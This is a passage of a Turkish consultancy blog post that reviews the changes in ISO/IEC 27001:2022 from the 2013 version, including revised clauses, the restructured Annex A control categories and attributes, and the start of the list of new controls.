tag:blogger.com,1999:blog-28154261346539267662024-03-13T16:16:56.060+03:00BTYÖN Blog Sayfası, Bilgi Güvenliği, İş Sürekliliği, BT YönetişimiBilgi Güvenliği, iş sürekliliği, ISO 27001, ISO 22301, ISO 20000, ITIL, COBIT, BT Yönetişimi, bilgi güvenliği eğitimleri, iş etki analizi, ISO 27001:2013 konularında danışmanlık, eğitim ve analiz hizmetleri sunan BTYÖN firmasının blog sayfasıdır.Ali DİNÇKANhttp://www.blogger.com/profile/06223197945975496965noreply@blogger.comBlogger141125tag:blogger.com,1999:blog-2815426134653926766.post-60456397642600570942022-11-07T23:34:00.003+03:002022-11-07T23:34:53.272+03:00<p style="text-align: center;"><b> ISO/IEC 27001:2022 ve ISO/IEC 27002:2022 İncelemesi</b></p><p style="text-align: center;"><b>Sinem Varol, ISO 27001 LA</b></p><p class="MsoNormal"><span lang="TR">Geçtiğimiz günlere kadar ISO/IEC 27001
standardının ulusal çapta geçerli olan 2013 versiyonu kullanılmaktaydı. Şubat
ayında ISO/IEC 27002 standardının 2022 versiyonunun yayınlanmasından sonra, ISO/IEC
27001 standardının yeni versiyonu 25 Ekim 2022 tarihinde yayınlandı. Bu
yazımızda standardın yeni versiyonunda yapılan değişiklikleri ve yenilikleri
inceleyeceğiz. <o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">1.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Değişiklikler incelendiğinde ilk
göze çarpanın standardın ismi olduğu görülüyor. 2013 versiyonunda “Bilgi
teknolojisi - Güvenlik teknikleri – Bilgi güvenliği yönetim sistemleri –
Gereksinimler” olan standart ismi yeni versiyonuyla birlikte “Bilgi güvenliği,
siber güvenlik ve mahremiyetin korunması– Bilgi güvenliği yönetim sistemleri –
Gereksinimler” olarak güncellendi.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">2.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Standardın içeriğinde yapılan
değişikliklerle birlikte 2013 versiyonu 23 sayfa uzunluğundayken 2022
versiyonunda bunun 19 sayfaya düştüğü fark ediliyor.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">3.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">2022 versiyonunda standardın Madde
3 Terimler ve tarifler başlığında kullanılabilecek terminoloji veri tabanları
bilgileri paylaşılmış. Yapılan ekleme “ISO ve IEC, standardizasyonda
kullanılmak üzere aşağıdaki adreslerdeki terminoloji veri tabanlarını sürdürür:<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>—
ISO Çevrimiçi tarama platformu: <span class="MsoHyperlink"><a href="https://www.iso.org/obp">https://www.iso.org/obp</a></span> adresinde
mevcut<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>—
IEC Elektropedia: <span class="MsoHyperlink"><a href="https://www.electropedia.org/">https://www.electropedia.org/</a></span>
adresinde mevcut<o:p></o:p></span></p>
<p class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">4.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Madde 4.2 İlgili tarafların
ihtiyaç ve beklentilerinin anlaşılması” maddesine “c) Bilgi güvenliği yönetim
sistemi vasıtasıyla bu gereksinimlerden hangilerinin ele alınacağı” ifadesi eklendi.
Güncel madde aşağıdaki gibi: <o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>“Kuruluş
aşağıdakileri belirleyecektir:<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>a)
Bilgi güvenliği yönetim sistemi ile ilgili taraflar;<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>b)
Bu ilgili tarafların bilgi güvenliği ile ilgili gereksinimleri;<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">(yeni) c) Bilgi güvenliği yönetim sistemi
aracılığıyla bu gereksinimlerden hangilerinin ele alınacağı.”<o:p></o:p></b></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Not
- İlgili tarafların gereksinimleri yasal ve düzenleyici gereksinimleri ve
sözleşmeden doğan <span style="mso-tab-count: 1;"> </span>yükümlülükleri
içeriyor olabilir.”<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">5.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Madde 4.4’e yapılan eklemeyle
birlikte yeni versiyonda süreçlere daha fazla odaklanıldığı fark ediliyor.
Güncel madde: “Kuruluş, <b style="mso-bidi-font-weight: normal;">ihtiyaç duyulan
süreçleri ve bu süreçlerin etkileşimlerini içeren,</b> bu standardın şartları
çerçevesinde bir bilgi güvenliği yönetim sistemini kurmalı, uygulamalı, sürdürmeli
ve sürekli iyileştirmelidir.”<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">6.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Yeni versiyonda bilgi güvenliği
hedefleri için 6.2 maddesine yeni gereksinimler eklendi (yenilikler kalın
harfle belirtilmiştir). <o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş, uygun işlevler ve seviyelerde
bilgi güvenliği amaçlarını tesis etmelidir.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Bilgi güvenliği amaçları aşağıdakileri
sağlamalıdır:<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>a) Bilgi güvenliği politikası ile
tutarlı olmalı,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>b) Ölçülebilir olmalı (uygulanabilirse),<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>c) Uygulanabilir bilgi güvenliği
şartlarını ve risk değerlendirme ve risk işlemenin sonuçlarını <span style="mso-tab-count: 1;"> </span>dikkate almalı,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">d)
İzlenmeli,<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>e) Duyurulmalı,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>f) Uygun şekilde güncellenmeli ve<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">g)
Yazılı bilgi olarak mevcut olmalıdır.<o:p></o:p></b></span></p>
<p class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">7.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Yeni versiyonda “6.3
Değişikliklerin planlanması” adlı yeni bir madde eklendi.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>6.3 Değişikliklerin planlanması<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş bilgi güvenliği yönetim
sistemindeki değişiklik ihtiyacını belirlediğinde, değişiklikler <span style="mso-tab-count: 1;"> </span>planlı bir şekilde
gerçekleştirilmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">8.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">7.4 İletişim maddesindeki
gereksinimlerde değişiklik yapıldı, yeni bir gereksinim eklendi.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Eski
versiyon:</b> 7.4 İletişim<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş aşağıdakileri içeren bilgi
güvenliği yönetim sistemi ile ilgili dâhili ve harici iletişim <span style="mso-tab-count: 1;"> </span>ihtiyaçlarını belirlemelidir:<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>a) İletişimin konusu,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>b) Ne zaman iletişim kurulacağı,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>c) Kiminle iletişim kurulacağı,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>d) Kimin iletişim kuracağı ve<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>e) İletişimin hangi süreçten
etkileneceği.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Yeni
versiyon:</b> 7.4 İletişim<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş aşağıdakileri içeren bilgi
güvenliği yönetim sistemi ile ilgili dâhili ve harici iletişim <span style="mso-tab-count: 1;"> </span>ihtiyaçlarını belirlemelidir:<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>a) İletişimin konusu,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>b) Ne zaman iletişim kurulacağı,<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>c) Kiminle iletişim kurulacağı ve<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">d)
Nasıl iletişime geçileceği.<o:p></o:p></b></span></p>
<p class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">9.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">8.1 İşletimsel planlama ve kontrol
maddesine yeni gereksinimler eklendi:<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Eski
versiyon: </span></b><span lang="TR">Kuruluş bilgi güvenliği şartlarını
karşılamak ve Madde 6.1’de belirlenen <span style="mso-tab-count: 1;"> </span>faaliyetleri
gerçekleştirmek için gerekli olan süreçleri planlamalı, uygulamalı ve kontrol <span style="mso-tab-count: 1;"> </span>etmelidir. Kuruluş, Madde 6.2’de belirlenen
bilgi güvenliği amaçlarını başarmak için aynı <span style="mso-tab-count: 1;"> </span>zamanda
planları uygulamalıdır.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş, süreçlerin planlandığı gibi
yürütüldüğünden emin olduğu noktaya kadar yazılı bilgileri <span style="mso-tab-count: 1;"> </span>saklamalıdır.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş, planlanan değişiklikleri
kontrol etmeli ve istenmeyen değişikliklerin sonuçlarını <span style="mso-tab-count: 1;"> </span>gözden geçirerek, gerekiyor ise
kötü etkileri azaltmak için eyleme geçmelidir.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş, dış kaynaklı süreçlerin belirlenmesini
ve kontrol edilmesini temin etmelidir.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Yeni
versiyon:</b> Kuruluş;<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="margin-left: 71.55pt; mso-add-space: auto; mso-list: l3 level1 lfo2; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span lang="TR">süreçler için kriterler oluşturarak ve<o:p></o:p></span></b></p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 71.55pt; mso-add-space: auto; mso-list: l3 level1 lfo2; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span lang="TR">kriterlere göre süreçlerin kontrolünü uygulayarak<o:p></o:p></span></b></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>şartları karşılamak ve Madde 6’da
belirlenen faaliyetleri gerçekleştirmek için gerekli olan <span style="mso-tab-count: 1;"> </span>süreçleri planlamalı, uygulamalı
ve kontrol etmelidir.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Yazılı bilgiler, süreçlerin planlandığı
gibi yürütüldüğünden emin olunduğu noktaya kadar <span style="mso-tab-count: 1;"> </span>mevcut olmalıdır.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş, planlanan değişiklikleri
kontrol etmeli ve istenmeyen değişikliklerin sonuçlarını <span style="mso-tab-count: 1;"> </span>gözden geçirerek, gerekiyor ise
kötü etkileri azaltmak için eyleme geçmelidir.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kuruluş, <b style="mso-bidi-font-weight: normal;">bilgi güvenliği yönetim sistemiyle ilgili dış kaynaklı süreçler,
ürünler ya da <span style="mso-tab-count: 1;"> </span>hizmetlerin kontrol
edilmesini</b> temin etmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">10.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">9.2 İç tetkik ve 9.3 Yönetimin
gözden geçirmesi maddelerinin yapısı değişti ve 9.3.2 Yönetimin gözden
geçirmesi girdileri maddesine yeni bir gereksinim eklendi.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Eski
versiyon:</b> 9.2 İç tetkik<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span><span style="mso-spacerun: yes;"> </span>9.3 Yönetimin gözden geçirmesi<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Yeni
versiyon:</b> 9.2 İç tetkik<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span><b style="mso-bidi-font-weight: normal;">9.2.1 Genel<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span>9.2.2 İç tetkik programı<o:p></o:p></span></b></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span>9.3 Yönetimin gözden geçirmesi<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span><b style="mso-bidi-font-weight: normal;">9.3.1 Genel<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span>9.3.2 Yönetimin gözden geçirmesi
girdileri<o:p></o:p></span></b></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span>9.3.3 Yönetimin gözden geçirmesi
sonuçları<o:p></o:p></span></b></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>c) Bilgi
güvenliği yönetim sistemiyle ilişkili ilgili tarafların ihtiyaç ve
beklentilerindeki <span style="mso-tab-count: 1;"> </span>değişiklikler<o:p></o:p></span></b></p>
<p class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">11.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">10 İyileştirme maddesinin
yapısında değişiklik yapıldı.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Eski
versiyon:</b> 10.1 Uygunsuzluk ve düzeltici faaliyet<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span>10.2 Sürekli iyileştirme<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span><b style="mso-bidi-font-weight: normal;">Yeni
versiyon:</b> 10.1 Sürekli iyileştirme<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 2;"> </span><span style="mso-spacerun: yes;"> </span>10.2 Uygunsuzluk ve düzeltici
faaliyet<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">12.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Ek-A bilgi güvenliği
kontrollerinde değişiklikler yapıldı. A.5’ten A.18’e kadar giden domain yapısı
değiştirildi, kontroller 4 kategoriye ayrıldı. Kontroller aşağıdaki gibi kategorize
edildi: <o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">a.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Eğer bireysel kişileri
ilgilendiriyorsa <b style="mso-bidi-font-weight: normal;">İnsan</b><o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">b.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Fiziksel nesnelerle ilgiliyse <b style="mso-bidi-font-weight: normal;">Fiziksel</b><o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">c.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Teknoloji ile ilgili ise <b style="mso-bidi-font-weight: normal;">Teknolojik</b><o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">d.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Aksi takdirde <b style="mso-bidi-font-weight: normal;">Organizasyonel</b><o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 14.2pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kontroller için sadece 2022
versiyonunda olan beş yeni nitelik tanımlandı. <o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="margin-left: 86.2pt; mso-add-space: auto; mso-list: l4 level2 lfo4; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">1.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Kontrol türü (Önleyici, Tespit
Edici, Düzeltici)<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 86.2pt; mso-add-space: auto; mso-list: l4 level2 lfo4; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">2.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Bilgi güvenliği özellikleri (G-B-E)<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 86.2pt; mso-add-space: auto; mso-list: l4 level2 lfo4; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">3.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Siber güvenlik kavramları (Tanımlama,
Koruma, Tespit Etme, Yanıt Verme ve Kurtarma)<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 86.2pt; mso-add-space: auto; mso-list: l4 level2 lfo4; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">4.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Operasyonel kabiliyetler<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 86.2pt; mso-add-space: auto; mso-list: l4 level2 lfo4; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">5.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Güvenlik alanları<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-left: 18.0pt;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Toplam kontrol sayısının 114’ten 93’e
düştüğü görülüyor. 11 yeni kontrol eklendi. Eklenen <span style="mso-tab-count: 1;"> </span>kontroller aşağıdaki gibi:<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.5.7 Tehdit istihbaratı<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.5.23 Bulut hizmetlerinin
kullanımı için bilgi güvenliği<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.5.30 İş sürekliliği için bilgi
ve iletişim teknolojilerinin hazırlığı<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.7.4 Fiziksel güvenlik izleme<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.9 Konfigürasyon yönetimi<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.10 Bilgi silme<o:p></o:p></span></p>
